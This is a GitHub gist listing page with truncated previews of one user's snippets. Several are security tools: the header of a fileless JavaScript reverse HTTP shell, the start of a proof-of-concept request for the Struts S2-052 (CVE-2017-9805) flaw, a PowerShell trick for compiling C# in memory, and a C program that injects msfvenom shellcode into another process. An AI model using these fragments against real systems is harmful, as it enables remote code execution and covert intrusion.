Skip to content

Instantly share code, notes, and snippets.

View Malayke's full-sized avatar

Malayke

  • planet Earth (Solar System)
View GitHub Profile
@Malayke
Malayke / items.py
Last active August 29, 2015 14:16
Crawl https://default-password.info All Usernames And Passwords
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
@Malayke
Malayke / pretty_print_mfoc_data.py
Last active February 26, 2017 04:20
Colorful output M1(Mifare Classic) Card data from mfoc
#!/usr/bin/env python
# coding = utf-8
# Colorful print Mfoc data
# date: 2015-3-21 ,Nuruz
# changelog:
# 2017-2-26:
# change output color to similar with Mifare Classic Tools.
__author__ = 'Malayke'
@Malayke
Malayke / Preferences.sublime-settings
Created October 2, 2015 01:49
My ST3 configuration
{
"auto_complete_commit_on_tab": true,
"color_scheme": "Packages/Theme - Spacegray/base16-eighties.dark.tmTheme",
"enable_tab_scrolling": false,
"ensure_newline_at_eof_on_save": true,
"file_exclude_patterns":
[
".DS_Store",
"*.sublime-workspace",
"*.scssc"
@Malayke
Malayke / JSRat.ps1
Created March 11, 2016 04:47
Fileless JavaScript Reverse HTTP Shell
<#
Author: Casey Smith @subTee
License: BSD3-Clause
.SYNOPSIS
Simple Reverse Shell over HTTP. Execute Commands on Client.
Most of the logic resides in https://github.com/beefproject/beef/tree/master/core/main/client
https://github.com/beefproject/beef/blob/master/core/main/client/beef.js establishes the beef object in the browser's DOM
window.onload then runs beef_init() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L24
Within beef_init() we run beef.net.browser_details() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L67
Within beef.net.browser_details() we gather response from beef.browser.getDetails() https://github.com/beefproject/beef/blob/master/core/main/client/net.js#L503
@Malayke
Malayke / gist:43f51f9073feff7a67f847e20da4072b
Created September 6, 2017 02:15
S2-052 CVE-2017-9805 POC
POST /struts2-rest-showcase/orders/3 HTTP/1.1
Host: localhost:8080
Content-Length: 1670
Cache-Control: max-age=0
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Content-Type: application/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
@Malayke
Malayke / frida-enumerate-loaded-classes.py
Last active December 13, 2017 10:49
Frida 获取加固后的 apk class 名
import frida, sys
def on_message(message, data):
if message['type'] == 'send':
print("[*] {0}".format(message['payload']))
else:
print(message)
jscode = """
Java.perform(function() {
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Create various tmp files
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
@Malayke
Malayke / getMoreDomains.py
Created September 9, 2018 05:02 — forked from milo2012/getMoreDomains.py
Get Domains Belonging to Organization from securitytrails.com
import requests
import json
import pprint
import sys
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver
import dns.reversename
import time
@Malayke
Malayke / NotCreateRemoteThread.c
Created September 9, 2018 15:10 — forked from securifybv/NotCreateRemoteThread.c
Run shell code in another process without CreateRemoteThread
#pragma comment(lib, "Shell32.lib")
#include <windows.h>
#include <shlobj.h>
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
int buf_len = 193;
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"